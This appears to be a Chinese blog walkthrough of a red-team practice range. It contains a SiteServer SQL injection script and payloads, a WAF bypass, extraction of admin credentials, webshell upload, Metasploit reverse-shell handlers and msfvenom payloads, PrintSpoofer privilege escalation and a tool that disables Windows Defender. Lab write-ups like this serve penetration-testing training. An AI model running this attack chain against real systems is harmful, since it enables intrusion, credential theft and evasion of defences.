暗月渗透实战靶场-项目七（上）

like4h

已于 2022-03-13 14:30:41 修改

阅读量3.1k

点赞数 2

分类专栏：红队文章标签：网络 linux 安全 web安全系统安全

于 2022-01-30 23:43:10 首次发布

本文链接：https://blog.csdn.net/weixin_46250265/article/details/122757158

版权

红队专栏收录该内容

6 篇文章 8 订阅

订阅专栏

暗月渗透实战靶场-项目七

环境配置

使用的是暗月提供的环境

直接虚拟机运行即可

设置网络环境

配置完成即可

网络拓扑

网络测试

外网

对于外网的主机144、我们是无法进行ping的、防火墙是拦截了ping的数据包的

我们可以直接访问、能访问成功说明外网的环境配置没有问题

内网

由于内网防火墙的设置、也是禁用了ping命令的

web机与OA办公机是无法互相ping的、验证的方式只能是通过直接访问其ip的80、端口即可

域控

域控机器是没有设置防火墙的、也没有禁用ping、可以直接ping测试、

00x1-信息搜集

IP确认

（内网是使用netdiscover、外网是使用ping查看或者是网站查询）

netdiscover

sudo netdiscover -i eth0 -r 192.168.1.0/24

端口扫描

masscan

sudo masscan -p 1-65535 192.168.1.150 --rate=1000

nmap

sudo nmap -p 21,80,999,6588,5985 -sS -sC -v -A 192.168.1.114 -oA 114

这里我们还发现了目标机使用的dns解析的地址信息

由于前面我们在访问的时候就知道是访问不了的肯定是需要进行域名的绑定的

再次访问

网站有安全狗

whataweb查询网站的cms

whatweb www.moonlab.com

WAF拦截

查询网站目录信息

使用dirsearch

python3 dirsearch.py  -u "www.moonlab.com" -t 1 -e*

由于有waf的存在这里要注意扫描的速度不能太快

小插曲

但是我们在使用的时候发现dirsearch是没有办法进行扫描的、直接就是报错

意思就是访问不到目标

但是网站是真实存在的

这个当时自己扫的时候一直是报错、一度怀疑是源码的问题、弄了半天原来是url的问题

使用gobuster

gobuster dir -u http://www.moonlab.com -w /usr/share/wordlists/dirb/big.txt -t 50

和上面的扫描同款问题

使用dirmap

python3 dirmap.py -i http://www.webhack123.com -lcf

并发过高会被拦截

使用工具进行扫描的时候都是没有办法进行的.

学着样子自己写一个目录遍历的脚本

#encoding:utf-8
from cgitb import reset
import requests
import sys
import time

# url = "http://www.moonlab.com"

with open ('dicc.txt','r',encoding='UTF-8') as readfile:
  for dirs in readfile.readlines():
    url = 'http://www.moonlab.com/'+dirs.strip('\n')
    resp = requests.get(url)
    strlen = len(resp.text)
    print(url+'---statu---'+str(resp.status_code)+'---lens---'+str(strlen))
    #sys.exit()
    time.sleep(2)
    if resp.status_code == 200 or resp.status_code == 403 or resp.status_code == 500 or resp.status_code == 301:
      if str(strlen) !=  "2939":
        with open('url.txt','a',encoding='UTF-8') as writefile:
          writefile.write(url+'---statu---'+str(resp.status_code)+'---lens---'+str(strlen)+'\n')

然后我们找到一些相关的文件

访问

00x2-漏洞利用

steserver后台管理页面泄露

查看当前版本

漏洞查询

然后进行相关漏洞的一些搜索

后台sql注入

发现在steserver中确实是存在sql注入

这里找到两个

https://github.com/w-digital-scanner/w9scan
https://github.com/hmoytx/WVS

但是后者没有前者的稳定好用、我们这里使用的是前者W9Scan

找到steserver的相关poc

poc测试

修改版

import requests

ps=[
        'siteserver/service/background_taskLog.aspx?Keyword=test%%27%20and%20convert(int,(char(71)%2Bchar(65)%2Bchar(79)%2Bchar(74)%2Bchar(73)%2B@@version))=1%20and%202=%271&DateFrom=&DateTo=&IsSuccess=All',
        'usercenter/platform/user.aspx?UnLock=sdfe%27&UserNameCollection=test%27)%20and%20char(71)%2Bchar(65)%2Bchar(79)%2Bchar(74)%2Bchar(73)%2B@@version=2;%20--',
        'siteserver/bbs/background_keywordsFilting.aspx?grade=0&categoryid=0&keyword=test%27%20and%20char(71)%2Bchar(65)%2Bchar(79)%2Bchar(74)%2Bchar(73)%2B@@version=1%20and%202=%271',
        'siteserver/userRole/background_administrator.aspx?RoleName=%27%20and%20char(71)%2Bchar(65)%2Bchar(79)%2Bchar(74)%2Bchar(73)%2B@@version=1%20and%201=%271&PageNum=0&Keyword=test&AreaID=0&LastActivityDate=0&Order=UserName',
        'siteserver/userRole/background_user.aspx?PageNum=0&Keyword=%27%20and%20char(71)%2Bchar(65)%2Bchar(79)%2Bchar(74)%2Bchar(73)%2B@@version=1%20and%201=%27&CreateDate=0&LastActivityDate=0&TypeID=0&DepartmentID=0&AreaID=0',
        'siteserver/bbs/background_thread.aspx?UserName=test&Title=%27%20and%201=char(71)%2Bchar(65)%2Bchar(79)%2Bchar(74)%2Bchar(73)%2B@@version%20and%201=%27&DateFrom=&DateTo=&ForumID=0',
        ]
for p in ps:
    url="http://www.moonlab.com/"+p
    res = requests.get(url)
    if res.status_code==500 and "GAOJIMicrosoft" in res.text:
      print(url+'\n')
      print('-------------------------------'+'\n')
      print(res.text)

关于上面的WVS的poc检测也是一样的

找到能用的payload

http://www.moonlab.com/usercenter/platform/user.aspx?UnLock=sdfe%27&UserNameCollection=test%27)%20and%20char(71)%2Bchar(65)%2Bchar(79)%2Bchar(74)%2Bchar(73)%2B@@version=2;%20--

访问

安全狗绕过

已经确认的安全语句

http://www.moonlab.com/usercenter/platform/user.aspx?UnLock=sdfe%27&UserNameCollection=test%27)%20and%20char(71)%2Bchar(65)%2Bchar(79)%2Bchar(74)%2Bchar(73)%2B@@version=2;%20--
url解码
http://www.moonlab.com/usercenter/platform/user.aspx?UnLock=sdfe'&UserNameCollection=test') and char(71)+char(65)+char(79)+char(74)+char(73)+@@version=2; --

上面的十六进制解码

然后尝试查询数据库名称

http://www.moonlab.com/usercenter/platform/user.aspx?UnLock=sdfe%27&UserNameCollection=test%27)and%20db_name()=2;%20--

sql注入被拦截

绕过

使用按位取反绕过

=~1

参考连接

按位取反绕过防火墙
http://cn-sec.com/archives/317348.html
安全狗绕过：
https://xz.aliyun.com/t/8000
https://xz.aliyun.com/t/7572
https://cloud.tencent.com/developer/article/1674113

绕过测试

http://www.moonlab.com/usercenter/platform/user.aspx?UnLock=sdfe%27&UserNameCollection=test%27)and%20db_name()=~2;%20--

查询数据库用户密码

针对数据库中的用户名密码来查询

前面我们已经知道这个是个steserver的框架、对于数据结构我们可以直接在搜索引擎上进行搜索

这里直接列出该数据表的功能

确定数据库用户名密码所在的数据表

进行查询

这里为了防止安全狗、我们一次查询的数量不会太多、一次一条

select top1 username from [msmoonlab].[msmoonlab].[bairong_Administrator]

测试

安全狗拦截

取反放在前面测试

?UnLock=sdfe'&UserNameCollection=test')and ~1= select top 1 username  from [msmoonlab].[msmoonlab].[bairong_Administrator]; --

可以过安全狗、但是语句说是select附近出现错误

加括号

成功执行

查询到用户名

admin

?UnLock=sdfe'&UserNameCollection=test')and ~1=(select top 1 username  from [msmoonlab].[msmoonlab].[bairong_Administrator]); --

查询密码

?UnLock=sdfe'&UserNameCollection=test')and ~1=(select top 1 password from [msmoonlab].[msmoonlab].[bairong_Administrator]); --

密码

64Cic1ERUP9n2OzxuKl9Tw==

查询加密方式

?UnLock=sdfe'&UserNameCollection=test')and ~1=(select top 1 PasswordFormat from [msmoonlab].[msmoonlab].[bairong_Administrator]); --

加密方式

Encrypted

查询加密盐值

?UnLock=sdfe'&UserNameCollection=test')and ~1=(select top 1 [PasswordSalt] from [msmoonlab].[msmoonlab].[bairong_Administrator]); --

盐值

LIywB/zHFDTuEA1LU53Opg==

查询加密方式

源码审计

DLL反编译

进行全局的查找

查找相应的加密方式、

编写解密

后台找回密码漏洞

参考

http://cn-sec.com/archives/71636.html
https://www.cnblogs.com/peterpan0707007/p/8721094.html
https://blog.tangwebsafe.com/2021/03/23/%E9%80%BB%E8%BE%91%E6%BC%8F%E6%B4%9E-%E9%AA%8C%E8%AF%81%E7%A0%81%E7%BB%95%E8%BF%87%E3%80%81%E5%AF%86%E7%A0%81%E6%89%BE%E5%9B%9E%E6%BC%8F%E6%B4%9E/

后台找回密码

抓包

将问题答案设置为空

直接将后台密码带出来

00x3-进入后台-上传shell

进入后台

查找webshell上传点

刚开始在内容模块上传文件是不行的、上传的文件都会被安全狗咬死的、

只能是找一些上传压缩包的地方、等到用的时候自动解压

站点模块管理是可以的

上传webshell

上传

自己不会写过狗的shell、5555555555、只能直接拿冰蝎的马试试能不能过了

连接

http://www.moonlab.com/SiteFiles/SiteTemplates/shell/shell.aspx
rebeyond

拿下

嫖的过狗马

使用蚁剑进行连接

00x4-信息搜集

信息搜集

冰蝎

主机信息

systeminfo

ip

两块网卡有东西

端口

netstat -ano

开启的服务

net start

查找对我们提权有帮助或者是又阻碍的服务

阻碍

safedog    安全狗
Defender   win自带的杀毒
firewall   防火墙

帮助

MySQL   提权
SQLserver 提权
Print Spooler   打印机服务提权

开启的进程

tasklist

防护进程

查看用户信息

whoami /all

SeImpersonatePrivilege        身份验证后模拟客户端 已启用      这个服务能够帮助我们提权

上MSF

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 9090
show options
run

连接

做个隧道

添加路由：

查看全局路由器
run get_local_subnets
添加10段的路由信息
run autoroute -s 10.10.1.0/24
查看添加的路由表信息
run autoroute -p

添加代理
use auxiliary/server/socks_proxy
show options
设置代理
set SRVPORT 5555
run

测试

proxychains4 curl 10.10.1.130

MSF转到CS

先将msf上获得的session放到后台运行
background
然后使用 exploit/windows/local/payload_inject来注入一个新的payload到session中

设置新的payload
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set LHOST 192.168.1.130    //cs主机地址
set LPORT 6060    //随意设置监听端口，需要和cs保持一致
set session 1    //设置需要派送的meterpreter
set DisablePayloadHandler true    //禁止产生一个新的handler

00x5-Windows server-2016漏洞提权

上面的防护软件我们已经清楚了、对于我们能过够利用提权的一些进程我们也已经查看了

搜索相关提权方法

我们可以利用的poc还是挺多的、但是安全狗的免杀也是很重要的

这里我们使用的是Windows的打印机漏洞、这个漏洞在20、21年都一直在爆0day

参考
https://www.cnblogs.com/trevain/p/13672443.html
http://caidaome.com/?post=285

免杀

上面介绍的都是使用dll动态链接库来做反弹的、但是这种上传上去就会被安全狗杀

这里使用上面的Print Spooler免杀

上传poc

这里我们得到的shell的用户权限是很小的、打开的终端也是不能查看文件切换目录的、所以我们在上传文件的时候要注意上传到最小用户也能读能执行的目录下、和Linux一样需要上传到Temp目录

执行

查看权限

printspoofer1.exe -i -c "whoami"

通过poc我们可以是system权限、但是没有办法

使用教程
https://github.com/itm4n/PrintSpoofer

我们使用poc开一个system权限的cmd进程、考虑在使用cs注入一个system的smb通道

PrintSpoofer.exe -i -c cmd

但是在cs上却不行

这种进程是用不了的

制作免杀攻击载荷

先制作反向代理的攻击载荷

sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.130 LPORT=6061 -e x86/shikata_ga_nai -i 20 -f c -o payload3.c

MSF设置监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 6061
exploit -j

攻击载荷进行shellcode编译

使用到的工具掩目

工具地址
https://github.com/1y0n/AV_Evasion_Tool

编译

生成免杀

上传

结果被windows杀软查杀

斗智斗勇阶段

被windows的杀软直接给杀了

然后使用掩目就不断的尝试变换shell一直都是不行的

中间又经过了两个小时

灵光一现

既然我们绕过不杀软、为何不直接将他杀了

开始想办法

终于功夫不负有心人

大佬就20小时前刚写的工具

https://github.com/APTortellini/DefenderSwitch

直接上

我们先利用打印机漏洞获取一个system的cmd

工具上传

执行

牛蛙牛蛙

直接关闭了Windows Defender Service

再次上传攻击载荷

再次上传我们msfvenom生成的攻击载荷

再次经过掩目做免杀、生成exe

上传

上传成功

Defender终于闭嘴了、狗哥也没有反应

执行exe

成功反弹session会话

system权限

注入系统进程

注入一个administrator的进程

在注入一个system的进程

转到CS

先将msf上获得的session放到后台运行
background
然后使用 exploit/windows/local/payload_inject来注入一个新的payload到session中

设置新的payload
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set LHOST 192.168.1.130    //cs主机地址
set LPORT 6060    //随意设置监听端口，需要和cs保持一致
set session 1    //设置需要派送的meterpreter
set DisablePayloadHandler true    //禁止产生一个新的handler

cs上线

转移进程

写在最后

欢迎大家加入星球一起学习、里面有各种红队资源、工具、各种小技巧啊！

like4h

关注

2
点赞
踩
11

收藏

觉得还不错? 一键收藏
打赏
1
评论
暗月渗透实战靶场-项目七（上）

暗月渗透实战靶场-项目七环境配置使用的是暗月提供的环境直接虚拟机运行即可设置网络环境配置完成即可网络拓扑网络测试外网对于外网的主机144、我们是无法进行ping的、防火墙是拦截了ping的数据包的我们可以直接访问、能访问成功说明外网的环境配置没有问题内网由于内网防火墙的设置、也是禁用了ping命令的web机与OA办公机是无法互相ping的、验证的方式只能是通过直接访问其ip的80、端口即可域控域控机器是没有设置防火墙的、也没有禁用ping、可以直接ping测试、00x
复制链接

扫一扫